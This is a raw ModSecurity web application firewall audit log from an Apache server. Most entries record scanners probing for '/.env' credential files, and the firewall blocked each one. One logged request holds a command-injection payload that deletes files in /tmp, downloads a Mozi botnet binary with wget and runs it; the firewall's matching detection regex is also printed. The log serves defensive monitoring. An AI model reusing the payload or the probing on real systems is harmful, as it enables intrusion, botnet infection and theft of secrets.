Host: mignere.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e6a1b572-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6a1b572-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745287936593108 758 (- - -) Stopwatch2: 1745287936593108 758; combined=283, p1=249, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6a1b572-Z-- --2b3dc55d-A-- [22/Apr/2025:10:33:02 +0700] aAcN7q3OiIHZ_gUDzTtsOAAAAMQ 103.236.140.4 51048 103.236.140.4 8181 --2b3dc55d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept-Charset: utf-8 --2b3dc55d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b3dc55d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745292782247103 835 (- - -) Stopwatch2: 1745292782247103 835; combined=412, p1=377, p2=0, p3=0, p4=0, p5=34, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b3dc55d-Z-- --fcce8b15-A-- [22/Apr/2025:10:34:40 +0700] aAcOUF9gRrTzIZGIAfk3fQAAAJU 103.236.140.4 33340 103.236.140.4 8181 --fcce8b15-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1 Accept-Charset: utf-8 --fcce8b15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcce8b15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745292880269904 717 (- - -) Stopwatch2: 1745292880269904 717; combined=318, p1=289, p2=0, p3=0, p4=0, p5=29, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcce8b15-Z-- --27836a78-A-- [22/Apr/2025:11:40:56 +0700] aAcd2F9gRrTzIZGIAfmMXAAAAIU 103.236.140.4 56592 103.236.140.4 8181 --27836a78-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 128.199.20.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 128.199.20.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --27836a78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27836a78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745296856674774 870 (- - -) Stopwatch2: 1745296856674774 870; combined=383, p1=342, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27836a78-Z-- --cddab21a-A-- [22/Apr/2025:13:18:01 +0700] aAc0mc0DNRaK3AYHswKlOQAAAAs 103.236.140.4 43794 103.236.140.4 8181 --cddab21a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca) Accept-Charset: utf-8 --cddab21a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cddab21a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745302681660552 737 (- - -) Stopwatch2: 1745302681660552 737; combined=282, p1=249, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cddab21a-Z-- --8e5bb77f-A-- [22/Apr/2025:14:27:06 +0700] aAdEyq3OiIHZ_gUDzTub3AAAAMs 103.236.140.4 56560 103.236.140.4 8181 --8e5bb77f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 95.214.54.165 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 95.214.54.165 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --8e5bb77f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e5bb77f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745306826060135 1100 (- - -) Stopwatch2: 1745306826060135 1100; combined=551, p1=505, p2=0, p3=0, p4=0, p5=45, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e5bb77f-Z-- --a4125001-A-- [22/Apr/2025:14:46:22 +0700] aAdJTi3NG0xEq1F63-KQHQAAAE0 103.236.140.4 47392 103.236.140.4 8181 --a4125001-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a4125001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4125001-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745307982664363 958 (- - -) Stopwatch2: 1745307982664363 958; combined=324, p1=291, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4125001-Z-- --25d0b070-A-- [22/Apr/2025:15:14:10 +0700] aAdP0V9gRrTzIZGIAfm5hQAAAIU 103.236.140.4 45940 103.236.140.4 8181 --25d0b070-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.69.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.69.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --25d0b070-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25d0b070-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745309649999656 779 (- - -) Stopwatch2: 1745309649999656 779; combined=298, p1=263, p2=0, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25d0b070-Z-- --daa19906-A-- [22/Apr/2025:16:00:33 +0700] aAdasa3OiIHZ_gUDzTsfvgAAANU 103.236.140.4 60834 103.236.140.4 8181 --daa19906-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 159.223.132.86 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 159.223.132.86 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --daa19906-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daa19906-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745312433097234 611 (- - -) Stopwatch2: 1745312433097234 611; combined=261, p1=231, p2=0, p3=0, p4=0, p5=30, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daa19906-Z-- --2a641164-A-- [22/Apr/2025:16:57:27 +0700] aAdoBy3NG0xEq1F63-IpuQAAAEA 103.236.140.4 59286 103.236.140.4 8181 --2a641164-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.144.212.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.144.212.120 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --2a641164-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a641164-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745315847613969 751 (- - -) Stopwatch2: 1745315847613969 751; combined=271, p1=239, p2=0, p3=0, p4=0, p5=31, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a641164-Z-- --8a43447e-A-- [22/Apr/2025:17:25:34 +0700] aAdunl9gRrTzIZGIAfkvkQAAAJU 103.236.140.4 52812 103.236.140.4 8181 --8a43447e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --8a43447e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a43447e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745317534784617 13285 (- - -) Stopwatch2: 1745317534784617 13285; combined=25231, p1=334, p2=0, p3=0, p4=0, p5=12464, sr=121, sw=0, l=0, gc=12433 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a43447e-Z-- --93acfc24-A-- [22/Apr/2025:17:26:48 +0700] aAdu6M0DNRaK3AYHswIbdQAAAAE 103.236.140.4 56594 103.236.140.4 8181 --93acfc24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36 Accept-Charset: utf-8 --93acfc24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93acfc24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745317608414862 857 (- - -) Stopwatch2: 1745317608414862 857; combined=361, p1=324, p2=0, p3=0, p4=0, p5=36, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93acfc24-Z-- --21e1dd47-A-- [22/Apr/2025:17:31:53 +0700] aAdwGa3OiIHZ_gUDzTt3fwAAANQ 103.236.140.4 44096 103.236.140.4 8181 --21e1dd47-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 Accept-Charset: utf-8 --21e1dd47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21e1dd47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745317913817775 847 (- - -) Stopwatch2: 1745317913817775 847; combined=367, p1=325, p2=0, p3=0, p4=0, p5=41, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21e1dd47-Z-- --87568250-A-- [22/Apr/2025:17:50:26 +0700] aAd0cq3OiIHZ_gUDzTuEpwAAAM0 103.236.140.4 44050 103.236.140.4 8181 --87568250-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 64.227.70.2 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --87568250-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87568250-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745319026349385 832 (- - -) Stopwatch2: 1745319026349385 832; combined=295, p1=260, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87568250-Z-- --ca65e84a-A-- [22/Apr/2025:18:55:31 +0700] aAeDs80DNRaK3AYHswJNPAAAAAQ 103.236.140.4 47210 103.236.140.4 8181 --ca65e84a-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ca65e84a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca65e84a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745322931892185 778 (- - -) Stopwatch2: 1745322931892185 778; combined=341, p1=303, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca65e84a-Z-- --8073f329-A-- [22/Apr/2025:19:43:44 +0700] aAePAM0DNRaK3AYHswJSFQAAABY 103.236.140.4 33684 103.236.140.4 8181 --8073f329-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 157.230.19.140 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 157.230.19.140 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --8073f329-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8073f329-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745325824103117 796 (- - -) Stopwatch2: 1745325824103117 796; combined=325, p1=282, p2=0, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8073f329-Z-- --87527603-A-- [22/Apr/2025:19:45:07 +0700] aAePUy3NG0xEq1F63-JxSAAAAEo 103.236.140.4 34132 103.236.140.4 8181 --87527603-B-- GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 77.239.222.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 77.239.222.139 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --87527603-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87527603-E-- --87527603-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws: cd/tmp rm -rf * wget http://192.168.1.1:8088/mozi.a chmod 777 mozi.a/tmp/mozi.a jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745325907055924 2130 (- - -) Stopwatch2: 1745325907055924 2130; combined=678, p1=427, p2=220, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87527603-Z-- --27cf7813-A-- [22/Apr/2025:19:45:24 +0700] aAePZM0DNRaK3AYHswJSNQAAABI 103.236.140.4 34218 103.236.140.4 8181 --27cf7813-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5 Accept-Charset: utf-8 --27cf7813-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27cf7813-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745325924249188 816 (- - -) Stopwatch2: 1745325924249188 816; combined=380, p1=344, p2=0, p3=0, p4=0, p5=36, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27cf7813-Z-- --3b90ea7f-A-- [22/Apr/2025:20:48:44 +0700] aAeePF9gRrTzIZGIAflmjQAAAIs 103.236.140.4 60522 103.236.140.4 8181 --3b90ea7f-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 165.227.84.14 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 165.227.84.14 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3b90ea7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b90ea7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745329724904801 826 (- - -) Stopwatch2: 1745329724904801 826; combined=299, p1=262, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b90ea7f-Z-- --068d3b12-A-- [22/Apr/2025:21:03:59 +0700] aAehz19gRrTzIZGIAflnhwAAAIo 103.236.140.4 36652 103.236.140.4 8181 --068d3b12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.69.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.69.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --068d3b12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --068d3b12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745330639073557 816 (- - -) Stopwatch2: 1745330639073557 816; combined=353, p1=317, p2=0, p3=0, p4=0, p5=36, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips 